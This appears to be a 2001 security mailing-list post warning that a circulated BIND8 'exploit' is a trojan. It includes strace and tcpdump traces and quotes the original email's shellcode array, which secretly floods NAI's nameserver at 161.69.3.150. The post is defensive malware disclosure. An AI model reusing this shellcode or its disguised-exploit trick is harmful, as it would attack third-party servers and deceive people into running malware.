Here is more detailed information about the "trojan" bind8 exploit posted
to Bugtraq.
When you run the alleged tsig exploit it actually manages to run the Linux
shellcode on the local system (in my environment I used a Redhat 6.2
install in VMware (local network only)).
The exploit forks, sends something to your actual target (appears to be a
*nonworking* remote exploit for bind) and in the child process floods
dns1.nai.com without mercy:
...
fork() = 614
[pid 612] getpid() = 612
[pid 612] socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP) = 3
[pid 612] sendto(3,
"\2d\204\0\0\1\0\0\0\0\0\1\0\315\200\203\304\10=\4\0\30"..., 512, 0,
{sin_family=AF_INET, sin_port=htons(53),
sin_addr=inet_addr("23.23.23.23")}}, 16) = 512
[pid 612] socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 4
[pid 612] connect(4, {sin_family=AF_INET, sin_port=htons(31338),
sin_addr=inet_addr("23.23.23.23")}}, 16 <unfinished ...>
[pid 614] time(NULL) = 981004491
[pid 614] socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP) = 3
[pid 614] sendto(3,
"/sh\0\0\3537^j\21j\2j\2jf\215\5a\0\0\0\315\200\211\302"..., 1024, 0,
{sin_family=AF_INET, sin_port=htons(53),
sin_addr=inet_addr("161.69.3.150")}}, 16) = 1024
[pid 614] sendto(3,
"/sh\0\0\3537^j\21j\2j\2jf\215\5a\0\0\0\315\200\211\302"..., 1024, 0,
{sin_family=AF_INET, sin_port=htons(53),
sin_addr=inet_addr("161.69.3.150")}}, 16) = 1024
...
(lots more sendto()...)
This is how those flood packets look with tcpdump
x.x.x.x.4691 > 161.69.3.150.53: 12147 updateMA [14174a] [235q] [27153n]
[27138au] (1024)
There's lots of them. This is bad depending on your like/dislike of NAI
and and/or law enforcement.
Drop that code and step away from the Internet!
Max
>Date: Wed, 31 Jan 2001 20:57:54 -0800
>To: [EMAIL PROTECTED]
>From: Max Vision <[EMAIL PROTECTED]>
>Subject: That BIND8 "exploit" attacks NAI
>
>Hi,
>
>Please beware of running code such as this. It will do it's best to
>attack NAI's nameserver. It's a typical, though well disguised, shellcode
>trick.
>Look in the Linux shellcode:
>\xa1\x45\x03\x96 == 161.69.3.150 == dns1.nai.com
>
>More details after I have a better look...
>Max
>
>At 04:12 PM 1/31/2001 -0700, you wrote:
>> >From Anonymous <[EMAIL PROTECTED]> Wed Jan 31 18:06:24 2001
>>Date: Thu, 31 Jan 2001 18:06:19 -0400
>>From: Anonymous <[EMAIL PROTECTED]>
>>To: [EMAIL PROTECTED]
>>Subject: Bind8 exploit
>>Message-ID: <[EMAIL PROTECTED]>
>>Mime-Version: 1.0
>>Content-Type: text/plain; charset="us-ascii"
>>X-Mailer: Internet Mail Service (5.5.2650.21)
>>
>>
>>/*
>> * Implements TSIG buffer mismanagement overflow for incorrect
>> signatures. That
>> * one was really nice bug!
>> * Thanks NAI for nice bug!
>> */
>>
>>/* zeroes in all shellcodes are allowed - we encode them anyway.. */
>>char linux_shellcode[] = /* modifyed Aleph1 linux shellcode to
>> * bind to tcp port 31338. hey aleph1
>> * :) */
>>"\xeb\x34\x5e\xbb\x01\x00\x00\x00\x89\xf1\xb8\x66\x00\x00\x00\xcd"
>>"\x80\x89\x46\x14\x8d\x46\x30\x89\x46\x18\x31\xc0\x89\x46\x20\x8d"
>>"\x46\x0c\x89\x46\x24\xb8\x66\x00\x00\x00\xbb\x0b\x00\x00\x00\x8d"
>>"\x4e\x14\xcd\x80\xeb\xef\xe8\xc7\xff\xff\xff\x02\x00\x00\x00\x02"
>>"\x00\x00\x00\x11\x00\x00\x00\x02\x00\x00\x35\xa1\x45\x03\x96\xff"
>>"\xff\xff\xff\xef\xff\xff\xff\x00\x04\x00\x00\x00\x00\x00\x00\x02"
>>"\x5f\x9a\x80\x10\x00\x00\x00/bin/sh\0";
